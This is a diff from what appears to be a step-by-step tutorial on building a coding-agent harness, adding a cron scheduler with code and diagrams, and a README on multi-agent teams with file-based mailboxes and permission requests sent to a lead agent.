+from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12, unchanged) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: 
str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. 
Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "schedule_cron, list_crons, cancel_cron.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "cron": "Use schedule_cron for recurring or scheduled tasks.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_cron"): + sections.append(PROMPT_SECTIONS["cron"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s13, unchanged) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit 
and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks. Use create_task to add some." + lines = [] + for t in tasks: + icon = {"pending": "○", "in_progress": "●", + "completed": "✓"}.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} " + f"[{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +# ── Background Tasks (from s13, unchanged) ── + +background_results: dict[str, str] = {} +background_lock = threading.Lock() + + +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + slow_keywords = ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) + + +def execute_tool(block) -> str: + handler = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, 
+ "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "schedule_cron": run_schedule_cron, "list_crons": run_list_crons, + "cancel_cron": run_cancel_cron, + }.get(block.name) + if handler: + return handler(**block.input) + return f"Unknown tool: {block.name}" + + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + threading.Thread(target=worker, daemon=True).start() + print(f" \033[33m[background] dispatched {tool_use_id[:12]}...\033[0m") + + +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + if ready: + for tid in ready: + print(f" \033[32m[background done] {tid[:12]}...\033[0m") + return ready + + +# ── Cron Scheduler (s14 new) ── + +DURABLE_PATH = WORKDIR / ".scheduled_tasks.json" + + +@dataclass +class CronJob: + id: str + cron: str # "0 9 * * *" + prompt: str # message to inject when fired + recurring: bool # True = recurring, False = one-shot + durable: bool # True = persist to disk + + +scheduled_jobs: dict[str, CronJob] = {} +cron_queue: list[CronJob] = [] +cron_lock = threading.Lock() +_last_fired: dict[str, int] = {} # job_id → minute_marker (prevent double-fire) + + +def _cron_field_matches(field: str, value: int) -> bool: + """Match a single cron field against a value.""" + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return int(lo) <= value <= int(hi) + return value == int(field) + + +def cron_matches(cron_expr: str, dt: datetime) -> bool: + """Check if a 5-field cron expression matches the given datetime.""" + fields = cron_expr.strip().split() + if 
len(fields) != 5:
        return False
    minute, hour, dom, month, dow = fields
    # dow: Python weekday() Monday=0..Sunday=6 → cron Sunday=0
    dow_val = (dt.weekday() + 1) % 7
    return all([
        _cron_field_matches(minute, dt.minute),
        _cron_field_matches(hour, dt.hour),
        _cron_field_matches(dom, dt.day),
        _cron_field_matches(month, dt.month),
        _cron_field_matches(dow, dow_val),
    ])


def save_durable_jobs():
    """Persist durable jobs to .scheduled_tasks.json."""
    durable = [asdict(j) for j in scheduled_jobs.values() if j.durable]
    DURABLE_PATH.write_text(json.dumps(durable, indent=2))


def load_durable_jobs():
    """Load durable jobs from disk on startup."""
    if not DURABLE_PATH.exists():
        return
    try:
        jobs = json.loads(DURABLE_PATH.read_text())
        for j in jobs:
            job = CronJob(**j)
            scheduled_jobs[job.id] = job
        if jobs:
            print(f" \033[35m[cron] loaded {len(jobs)} durable job(s)\033[0m")
    except Exception:
        pass


def schedule_job(cron: str, prompt: str, recurring: bool = True,
                 durable: bool = True) -> CronJob:
    """Register a new cron job."""
    job = CronJob(
        id=f"cron_{random.randint(0, 999999):06d}",
        cron=cron, prompt=prompt,
        recurring=recurring, durable=durable,
    )
    with cron_lock:
        scheduled_jobs[job.id] = job
        if durable:
            save_durable_jobs()
    print(f" \033[35m[cron register] {job.id} '{cron}' → {prompt[:40]}\033[0m")
    return job


def cancel_job(job_id: str) -> str:
    """Cancel a cron job."""
    with cron_lock:
        job = scheduled_jobs.pop(job_id, None)
    if not job:
        return f"Job {job_id} not found"
    if job.durable:
        save_durable_jobs()
    print(f" \033[31m[cron cancel] {job_id}\033[0m")
    return f"Cancelled {job_id}"


def cron_scheduler_loop():
    """Independent daemon thread: poll every 1s, fire matching jobs."""
    while True:
        time.sleep(1)
        now = datetime.now()
        # Minutes since epoch: unique per minute across days, so a daily
        # job is not suppressed by yesterday's firing at the same time.
        minute_marker = int(now.timestamp() // 60)
        with cron_lock:
            for job in list(scheduled_jobs.values()):
                if cron_matches(job.cron, now):
                    if _last_fired.get(job.id) != minute_marker:
                        cron_queue.append(job)
                        _last_fired[job.id] = minute_marker
                        print(f" \033[35m[cron fire] {job.id} → "
                              f"{job.prompt[:40]}\033[0m")
                        if not job.recurring:
                            scheduled_jobs.pop(job.id, None)
                            if job.durable:
                                save_durable_jobs()


def consume_cron_queue() -> list[CronJob]:
    """Consume fired jobs from cron_queue (called by agent_loop)."""
    with cron_lock:
        fired = list(cron_queue)
        cron_queue.clear()
    return fired


# Load durable jobs on startup, then start scheduler thread
load_durable_jobs()
threading.Thread(target=cron_scheduler_loop, daemon=True).start()
print(" \033[35m[cron] scheduler thread started\033[0m")


# ── Cron Tools ──

def run_schedule_cron(cron: str, prompt: str,
                      recurring: bool = True, durable: bool = True) -> str:
    job = schedule_job(cron, prompt, recurring, durable)
    return f"Scheduled {job.id}: '{cron}' → {prompt}"


def run_list_crons() -> str:
    with cron_lock:
        jobs = list(scheduled_jobs.values())
    if not jobs:
        return "No cron jobs. Use schedule_cron to add one."
+ lines = [] + for j in jobs: + tag = "recurring" if j.recurring else "one-shot" + dur = "durable" if j.durable else "session" + lines.append(f" {j.id}: '{j.cron}' → {j.prompt[:40]} " + f"[{tag}, {dur}]") + return "\n".join(lines) + + +def run_cancel_cron(job_id: str) -> str: + return cancel_job(job_id) + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a new task with optional blockedBy dependencies.", + "input_schema": {"type": "object", + "properties": { + "subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks with status, owner, and dependencies.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "schedule_cron", + "description": "Schedule a cron job. 
cron is 5-field: min hour dom month dow.", + "input_schema": {"type": "object", + "properties": { + "cron": {"type": "string", + "description": "5-field cron expression"}, + "prompt": {"type": "string", + "description": "Message to inject when fired"}, + "recurring": {"type": "boolean", + "description": "True=recurring, False=one-shot"}, + "durable": {"type": "boolean", + "description": "True=persist to disk"}}, + "required": ["cron", "prompt"]}}, + {"name": "list_crons", + "description": "List all registered cron jobs.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "cancel_cron", + "description": "Cancel a cron job by ID.", + "input_schema": {"type": "object", + "properties": {"job_id": {"type": "string"}}, + "required": ["job_id"]}}, +] + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_cron": "cron" in text or "schedule" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + # Consume fired cron jobs → inject as messages + fired = consume_cron_queue() + for job in fired: + messages.append({"role": "user", + "content": f"[Scheduled] {job.prompt}"}) + print(f" \033[35m[inject cron] {job.prompt[:50]}\033[0m") + + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", + "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + 
continue + print(f"\033[36m> {block.name}\033[0m") + + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": output}) + + # Inject completed background results + bg_results = collect_background_results() + if bg_results: + bg_content = [{"type": "tool_result", + "tool_use_id": tid, "content": out} + for tid, out in bg_results.items()] + messages.append({"role": "user", "content": bg_content}) + + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s14: cron scheduler") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, + "has_cron": False, "memories": ""} + while True: + try: + query = input("\033[36ms14 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s14_cron_scheduler/images/cron-scheduler-overview.en.svg b/s14_cron_scheduler/images/cron-scheduler-overview.en.svg new file mode 100644 index 000000000..fe9de1fe7 --- /dev/null +++ b/s14_cron_scheduler/images/cron-scheduler-overview.en.svg @@ -0,0 +1,125 @@ + + + + + + + + + + + + + + + + + + + Cron Scheduler — Independent scheduler thread + cron_queue injection point + + + + s10-s13 retained + + s14 new + + + + + + consume + cron_queue + ★ s14 injection + + + + + + messages + + + + + + 
prompt + cache + assemble_system_prompt + (s10) + + + + + + LLM (try/except) + with_retry + (s11) + + + + + + TOOL DISPATCH + fast → sync (bash, read, write) + slow → background thread (s13) + cron → schedule_cron, list, cancel (s14) + task → create, list, claim, complete (s12) + + + + loop back: tool_results → next turn + + + + cron_scheduler_loop (daemon thread) + time.sleep(1) → cron_matches(job.cron, now) + match → cron_queue.append(job) + minute_marker prevents double-fire per minute + one-shot jobs auto-delete after firing + + + + + + + cron_queue + cron_lock · scheduler writes · loop reads + + + + inject each turn + + + + CronJob + Persistence + CronJob dataclass: + id, cron, prompt, recurring, durable + Durable → .scheduled_tasks.json + restored via load_durable_jobs after restart + Session-only → memory only + lost when process exits + ⚠ Process exit = scheduler stops (not OS-level crontab) + + + + 5-field Cron Expression + + * + + * + + * + + * + + * + min + hour + day + month + dow + + */5 * * * * → every 5 minutes + 0 9 * * 1-5 → weekdays 9:00 + 0 9 * * * → daily 9:00 + Supports: *, */N, N, N-M, N,M,... 
+ diff --git a/s14_cron_scheduler/images/cron-scheduler-overview.ja.svg b/s14_cron_scheduler/images/cron-scheduler-overview.ja.svg new file mode 100644 index 000000000..daf20a880 --- /dev/null +++ b/s14_cron_scheduler/images/cron-scheduler-overview.ja.svg @@ -0,0 +1,125 @@ + + + + + + + + + + + + + + + + + + + Cron Scheduler — 独立スケジューラスレッド + cron_queue 注入ポイント + + + + s10-s13 維持 + + s14 新規 + + + + + + consume + cron_queue + ★ s14 注入点 + + + + + + messages + + + + + + prompt + cache + assemble_system_prompt + (s10) + + + + + + LLM (try/except) + with_retry + (s11) + + + + + + TOOL DISPATCH + fast → sync (bash, read, write) + slow → background thread (s13) + cron → schedule_cron, list, cancel (s14) + task → create, list, claim, complete (s12) + + + + loop back: tool_results → next turn + + + + cron_scheduler_loop (daemon スレッド) + time.sleep(1) → cron_matches(job.cron, now) + マッチ → cron_queue.append(job) + minute_marker で同一分の重複発火を防止 + 一度きりのタスクは発火後自動削除 + + + + + + + cron_queue + cron_lock · スケジューラ書込 · loop 読込 + + + + 毎ターン注入 + + + + CronJob + 永続化 + CronJob dataclass: + id, cron, prompt, recurring, durable + Durable → .scheduled_tasks.json + 再起動後 load_durable_jobs で復元 + Session-only → メモリのみ + プロセス終了で消失 + ⚠ プロセス終了 = スケジューラ停止(OS レベルの crontab ではない) + + + + 5 フィールド Cron 式 + + * + + * + + * + + * + + * + + + + + 曜日 + + */5 * * * * → 5 分ごと + 0 9 * * 1-5 → 平日 9:00 + 0 9 * * * → 毎日 9:00 + 対応: *, */N, N, N-M, N,M,... 
+ diff --git a/s14_cron_scheduler/images/cron-scheduler-overview.svg b/s14_cron_scheduler/images/cron-scheduler-overview.svg new file mode 100644 index 000000000..94cf77b88 --- /dev/null +++ b/s14_cron_scheduler/images/cron-scheduler-overview.svg @@ -0,0 +1,125 @@ + + + + + + + + + + + + + + + + + + + Cron Scheduler — 独立调度线程 + cron_queue 注入点 + + + + s10-s13 保留 + + s14 新增 + + + + + + consume + cron_queue + ★ s14 注入点 + + + + + + messages + + + + + + prompt + cache + assemble_system_prompt + (s10) + + + + + + LLM (try/except) + with_retry + (s11) + + + + + + TOOL DISPATCH + fast → sync (bash, read, write) + slow → background thread (s13) + cron → schedule_cron, list, cancel (s14) + task → create, list, claim, complete (s12) + + + + loop back: tool_results → next turn + + + + cron_scheduler_loop(独立 daemon 线程) + time.sleep(1) → cron_matches(job.cron, now) + 匹配 → cron_queue.append(job) + minute_marker 防同分钟重复触发 + 一次性任务触发后自动删除 + + + + + + + cron_queue + cron_lock 保护 · 调度线程写 · agent_loop 读 + + + + 每轮注入 + + + + CronJob + 持久化 + CronJob dataclass: + id, cron, prompt, recurring, durable + Durable → .scheduled_tasks.json + 重启后 load_durable_jobs 恢复 + Session-only → 内存 only + 进程关闭即丢 + ⚠ 进程关闭 = 调度停止(不是 OS 级 crontab) + + + + 五段式 Cron 表达式 + + * + + * + + * + + * + + * + 分钟 + 小时 + + + 星期 + + */5 * * * * → 每 5 分钟 + 0 9 * * 1-5 → 工作日 9:00 + 0 9 * * * → 每天 9:00 + 支持: *, */N, N, N-M, N,M,... + diff --git a/s15_agent_teams/README.en.md b/s15_agent_teams/README.en.md new file mode 100644 index 000000000..620dde5ce --- /dev/null +++ b/s15_agent_teams/README.en.md @@ -0,0 +1,259 @@ +# s15: Agent Teams — One Can't Do It Alone, Form a Team + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s13 → s14 → `s15` → [s16](../s16_team_protocols/) → s17 → s18 → s19 + +> *"One can't do it alone, form a team"* — Persistent teammates + async mailboxes. +> +> **Harness Layer**: Teams — Multi-agent collaboration, message bus. 
+ +--- + +## The Problem + +A restaurant kitchen doesn't have one person doing everything. The chef cooks, the prep cook prepares ingredients, the dishwasher washes dishes — each handles their own domain, passing dishes through the window. If the chef had to both cook and wash dishes, the output would be slow, and the dishes wouldn't be clean. + +Same with agents. "Refactor the entire backend" involves the auth module, database layer, API routes, and tests. One agent working on API routes will forget the details of the auth module. The context window is only so big. + +s06's sub-agents are temporary workers — called in for one task and then gone. But some tasks require persistent teammates who can communicate at any time. + +--- + +## The Solution + +![Agent Teams Overview](images/agent-teams-overview.en.svg) + +All of s14's capabilities are preserved (prompt assembly, error recovery, task graph, background threads, cron scheduling). Three additions: **MessageBus** (file inboxes), **spawn_teammate_thread** (launch teammate threads), **inbox polling** (Lead receives teammate messages). + +Sub-agents vs Teammates: + +| | s06 Sub-agent | s15 Teammate | +|---|---|---| +| Lifecycle | One-shot, destroyed after use | Persistent, alive until done or shut down | +| Communication | Only returns final conclusion | Async inbox, communicate anytime | +| Context | Fully isolated | Share information via messages | +| Count | One main agent + occasional sub-agent | One Lead + multiple teammates | + +--- + +## How It Works + +![Team Topology](images/team-topology.en.svg) + +### MessageBus: File Inboxes + +Every agent (including Lead and teammates) has a `.jsonl` mailbox. Sending a message = appending a JSON line to the recipient's file. 
Reading messages = reading the file + deleting (consumption mode): + +```python +class MessageBus: + def send(self, from_agent: str, to_agent: str, + content: str, msg_type: str = "message"): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time()} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines()] + inbox.unlink() # Consumption: delete after reading + return msgs +``` + +Why files instead of in-memory queues? Because file appends are cross-thread safe (atomic append), and the tutorial doesn't need complex locks like `proper-lockfile`. CC also uses file inboxes (`~/.claude/teams/{team}/inboxes/`), just with file locks to prevent concurrent write conflicts. + +### spawn_teammate_thread: Launch Teammates + +The Lead calls the `spawn_teammate` tool to launch a teammate. The teammate runs in its own daemon thread, with its own system prompt, its own messages, and its own simplified tool set: + +```python +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + system = f"You are '{name}', a {role}. Use tools to complete tasks." + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [bash, read_file, write_file, send_message] + for _ in range(10): # Max 10 rounds + inbox = BUS.read_inbox(name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + # ... 
execute tools, handle results + # When done, send summary to Lead + BUS.send(name, "lead", summary, "result") + + threading.Thread(target=run, daemon=True).start() +``` + +Key design decisions: +- **Teammates have a simplified tool set**: bash, read, write, send_message. They don't need cron, task system, or other Lead-exclusive tools +- **Maximum 10 rounds**: prevents teammates from looping infinitely +- **Auto-report when done**: `BUS.send(name, "lead", summary)` sends the final result to Lead's inbox + +### Lead's Inbox Polling + +After each main loop iteration, Lead checks its inbox — any messages from teammates: + +```python +# After main loop iteration +inbox = BUS.read_inbox("lead") +if inbox: + print(f"[Inbox: {len(inbox)} messages]") + for msg in inbox: + print(f" From {msg['from']}: {msg['content'][:200]}") +``` + +The tutorial polls outside the loop. CC is more refined — Lead's `useInboxPoller` checks every 1 second and submits new messages as a new turn. + +### Permission Bubbling + +When a teammate encounters an operation requiring approval (e.g., deleting a file), it can't decide on its own. It sends a `permission_request` message to Lead, who makes the final decision: + +``` +teammate: "I need to delete config.py" → BUS.send("alice", "lead", "...", "permission_request") +Lead: receives request → user approval → BUS.send("lead", "alice", "approved") +teammate: receives reply → continues execution +``` + +The tutorial simplifies permission bubbling. CC has a dedicated `useSwarmPermissionPoller` that polls every 500ms, with 15 structured message types. + +### Putting It Together + +``` +1. Lead: "Build the backend: one agent can't do it, let's form a team" +2. Lead → spawn_teammate("alice", "backend dev", "Create database schema") +3. Lead → spawn_teammate("bob", "frontend dev", "Write API client") +4. alice thread starts → own LLM calls → bash "python manage.py migrate" +5. bob thread starts → own LLM calls → write_file("client.ts", ...) +6. 
alice finishes → BUS.send("alice", "lead", "Schema done: users, orders tables") +7. bob finishes → BUS.send("bob", "lead", "Client written with types") +8. Lead next iteration → check_inbox → sees alice and bob's results +``` + +Two teammates work in parallel, Lead doesn't wait idly. + +--- + +## Changes from s14 + +| Component | Before (s14) | After (s15) | +|-----------|-------------|-------------| +| Agent count | 1 | 1 Lead + N persistent teammate threads | +| Communication | None | MessageBus + .mailboxes/*.jsonl | +| New classes | — | MessageBus, active_teammates dict | +| New functions | — | spawn_teammate_thread, run_send_message, run_check_inbox | +| Lead tools | 10 (s14) | + spawn_teammate, send_message, check_inbox (13) | +| Teammate tools | — | bash, read_file, write_file, send_message (4) | +| Permissions | Local decision | Bubble to Lead (simplified in tutorial) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s15_agent_teams/code.py +``` + +Try these prompts: + +1. `Spawn alice as a backend developer. Ask her to create a file called schema.sql with a users table.` +2. `Check your inbox for alice's result.` +3. `Spawn bob as a tester. Ask him to check if schema.sql exists and list its contents.` + +What to observe: How does Lead launch teammates? What do the `.mailboxes/` JSONL files look like? Does Lead's inbox receive messages when teammates finish? + +--- + +## What's Next + +Teammates can work and communicate. But if Lead wants Alice to shut down, killing the thread directly would leave half-written files. A graceful handshake protocol is needed — "please shut down" → "OK, let me finish up and I'll close." + +s16 Team Protocols → Teammates need conventions too. + +
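Before the deep dive, the file-inbox mechanics from How It Works are small enough to verify without an LLM. A minimal self-contained sketch (a temporary directory stands in for the tutorial's `.mailboxes/`):

```python
import json
import tempfile
import time
from pathlib import Path

MAILBOX_DIR = Path(tempfile.mkdtemp())  # stand-in for .mailboxes/

def send(from_agent: str, to_agent: str, content: str,
         msg_type: str = "message") -> None:
    """Append one JSON line to the recipient's inbox file."""
    msg = {"from": from_agent, "to": to_agent, "content": content,
           "type": msg_type, "ts": time.time()}
    with open(MAILBOX_DIR / f"{to_agent}.jsonl", "a") as f:
        f.write(json.dumps(msg) + "\n")

def read_inbox(agent: str) -> list[dict]:
    """Consumption mode: read every message, then delete the file."""
    inbox = MAILBOX_DIR / f"{agent}.jsonl"
    if not inbox.exists():
        return []
    msgs = [json.loads(line) for line in inbox.read_text().splitlines()]
    inbox.unlink()
    return msgs

send("alice", "lead", "Schema done: users, orders tables", "result")
send("bob", "lead", "Client written with types", "result")

first = read_inbox("lead")   # both messages arrive in send order
second = read_inbox("lead")  # empty: the first read consumed the file
print([m["from"] for m in first], second)  # ['alice', 'bob'] []
```

The second read always comes back empty — delete-on-read is what lets the Lead treat every poll as "new mail only".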
+Deep Dive into CC Source + +> The following is a complete analysis based on CC source code `spawnMultiAgent.ts`, `useInboxPoller.ts` (969 lines), `useSwarmPermissionPoller.ts` (330 lines), `teammateMailbox.ts`, `teamHelpers.ts`. + +### 1. No Central Message Bus — It's the Filesystem + +The tutorial uses a `MessageBus` class to send/receive messages. CC's approach is more direct: **each agent directly writes to other agents' inbox files**. + +Inbox path: `~/.claude/teams/{teamName}/inboxes/{agentName}.json` + +Writes use `proper-lockfile` for concurrency safety (up to 10 retries). Each file is a JSON array; appending reads → appends → writes back. + +### 2. 15 Message Types + +CC's team communication has 15 structured messages (`teammateMailbox.ts`): + +| Type | Direction | Purpose | +|------|-----------|---------| +| `plain text` | Bidirectional | Normal inter-teammate communication | +| `idle_notification` | Teammate→Lead | Teammate finished a turn, now idle | +| `permission_request` | Teammate→Lead | Teammate needs operation approval | +| `permission_response` | Lead→Teammate | Lead's approval result | +| `plan_approval_request` | Teammate→Lead | Teammate submits plan for review | +| `plan_approval_response` | Lead→Teammate | Lead reviews plan | +| `shutdown_request` | Lead→Teammate | Request graceful shutdown | +| `shutdown_approved` | Teammate→Lead | Confirms shutdown | +| `shutdown_rejected` | Teammate→Lead | Rejects shutdown (with reason) | +| `task_assignment` | Lead→Teammate | Assign task | +| `team_permission_update` | Lead→Teammate | Broadcast permission change | +| `mode_set_request` | Lead→Teammate | Change teammate's permission mode | +| `sandbox_permission_*` | Bidirectional | Network permission request/reply | +| `teammate_terminated` | System | Teammate removed notification | + +Text messages are wrapped in `` XML tags for delivery to the model. + +### 3. Permission Bubbling: Dual Polling + +The tutorial simplifies permission bubbling. 
CC's actual flow (`permissionSync.ts`): + +1. **Teammate** encounters an operation requiring approval → sends `permission_request` to Lead's inbox +2. **Lead's** `useInboxPoller` (polls every 1 second) detects the request → routes to `ToolUseConfirmQueue` +3. Lead's UI shows approval dialog with teammate name and color +4. After user approval → Lead sends `permission_response` back to teammate's inbox +5. **Teammate's** `useSwarmPermissionPoller` (polls every 500ms) receives reply → continues or rejects execution + +### 4. Teammate Lifecycle + +CC teammates are created by `spawnTeammate()` (`spawnMultiAgent.ts`): + +1. **Spawn**: Create tmux pane (or in-process), assign color, write to team config +2. **Work**: `useInboxPoller` checks inbox every 1 second → new messages become new turns +3. **Idle**: Stop hook fires → sends `idle_notification` to Lead +4. **Shutdown**: Lead sends `shutdown_request` → teammate replies `shutdown_approved` → Lead cleans up + +### 5. Team Config + +Team registry at `~/.claude/teams/{teamName}/config.json` (`teamHelpers.ts`): + +```json +{ + "name": "my-team", + "leadAgentId": "lead@my-team", + "members": [{ + "agentId": "researcher@my-team", + "name": "researcher", + "agentType": "general-purpose", + "color": "blue", + "isActive": true + }] +} +``` + +Teammates cannot nest (`AgentTool.tsx:273` explicitly prohibits "teammates spawning other teammates"). + +
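The read → append → write-back pattern from section 1 can also be sketched in the tutorial's Python. Here an exclusive `.lock` file stands in for `proper-lockfile` (which is Node-side); the retry count mirrors the 10 retries mentioned above, and all names are illustrative rather than CC's actual values:

```python
import json
import os
import tempfile
import time
from pathlib import Path

def append_with_lock(inbox: Path, msg: dict, retries: int = 10) -> None:
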